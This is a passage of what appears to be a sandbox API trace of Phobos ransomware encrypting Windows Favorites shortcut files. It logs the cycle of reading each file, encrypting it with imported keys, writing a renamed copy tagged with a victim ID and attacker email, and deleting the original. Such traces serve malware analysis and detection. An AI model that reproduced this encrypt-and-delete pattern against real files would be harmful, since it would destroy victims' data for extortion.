websites\\msn entertainment.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.853] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=133) returned 1 [0211.854] CloseHandle (hObject=0xfc) returned 1 [0211.854] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url")) returned 0x20 [0211.854] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.854] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.854] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.854] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.855] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.855] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.855] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x85, lpOverlapped=0x0) returned 1 [0211.856] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90, dwBufLen=0x90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90) returned 1 [0211.856] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x90, lpOverlapped=0x0) returned 1 [0211.857] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.857] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.857] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0211.857] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.857] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0211.857] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.857] CloseHandle (hObject=0xfc) returned 1 [0211.857] CloseHandle (hObject=0xac) returned 1 [0211.857] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url")) returned 1 [0211.858] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.859] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=133) returned 1 [0211.859] CloseHandle (hObject=0xac) returned 1 [0211.859] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url")) returned 0x20 [0211.859] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.859] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.859] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.860] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.860] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.860] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x85, lpOverlapped=0x0) returned 1 [0211.861] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90, dwBufLen=0x90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90) returned 1 [0211.861] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x90, lpOverlapped=0x0) returned 1 [0211.862] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.862] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.862] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0211.862] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.862] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0211.862] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.862] CloseHandle (hObject=0xac) returned 1 [0211.862] CloseHandle (hObject=0xfc) returned 1 [0211.862] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url")) returned 1 [0211.863] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.864] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=133) returned 1 [0211.864] CloseHandle (hObject=0xfc) returned 1 [0211.864] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url")) returned 0x20 [0211.864] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.864] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.864] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.864] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.865] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.865] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.865] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x85, lpOverlapped=0x0) returned 1 [0211.866] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90, dwBufLen=0x90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90) returned 1 [0211.866] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x90, lpOverlapped=0x0) returned 1 [0211.866] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.866] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.866] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0211.866] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.866] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0211.866] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.866] CloseHandle (hObject=0xfc) returned 1 [0211.867] CloseHandle (hObject=0xac) returned 1 [0211.867] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url")) returned 1 [0211.867] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.867] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.868] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=133) returned 1 [0211.868] CloseHandle (hObject=0xac) returned 1 [0211.868] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url")) returned 0x20 [0211.868] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.868] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.868] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.868] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.869] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.869] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.869] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x85, lpOverlapped=0x0) returned 1 [0211.870] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90, dwBufLen=0x90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90) returned 1 [0211.870] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x90, lpOverlapped=0x0) returned 1 [0211.871] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.871] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.871] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30, dwBufLen=0x30 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x30) returned 1 [0211.871] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.871] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xe2, lpOverlapped=0x0) returned 1 [0211.871] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.871] CloseHandle (hObject=0xac) returned 1 [0211.871] CloseHandle (hObject=0xfc) returned 1 [0211.871] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url")) returned 1 [0211.872] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.872] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.873] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=133) returned 1 [0211.873] CloseHandle (hObject=0xfc) returned 1 [0211.873] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url")) returned 0x20 [0211.873] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.873] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.873] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.873] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.874] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.874] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.874] ReadFile (in: hFile=0xfc, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x85, lpOverlapped=0x0) returned 1 [0211.876] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90, dwBufLen=0x90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90) returned 1 [0211.876] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x90, lpOverlapped=0x0) returned 1 [0211.877] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.877] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.877] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0211.877] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.877] WriteFile (in: hFile=0xac, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0211.877] CryptDestroyKey (hKey=0xa32928) returned 1 [0211.877] CloseHandle (hObject=0xfc) returned 1 [0211.877] CloseHandle (hObject=0xac) returned 1 [0211.877] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msnbc news.url")) returned 1 [0211.878] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0211.878] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.916] GetFileSizeEx (in: hFile=0xac, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=133) returned 1 [0211.916] CloseHandle (hObject=0xac) returned 1 [0211.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url")) returned 0x20 [0211.918] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0211.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xac [0211.919] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.919] SetFilePointerEx (in: hFile=0xac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0211.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Favorites\\Windows Live\\Get Windows Live.url.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\default\\favorites\\windows live\\get windows live.url.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0211.919] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32928) returned 1 [0211.919] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.920] ReadFile (in: hFile=0xac, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x85, lpOverlapped=0x0) returned 1 [0211.920] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90, dwBufLen=0x90 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x90) returned 1 [0211.920] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x90, lpOverlapped=0x0) returned 1 [0211.921] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32a28) returned 1 [0211.921] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0211.921] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0211.921] CryptDestroyKey (hKey=0xa32a28) returned 1 [0211.921] WriteFile (in: hFile=0xfc, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0211.922] CryptDestroyKey (hKey=0xa32928) returned 1 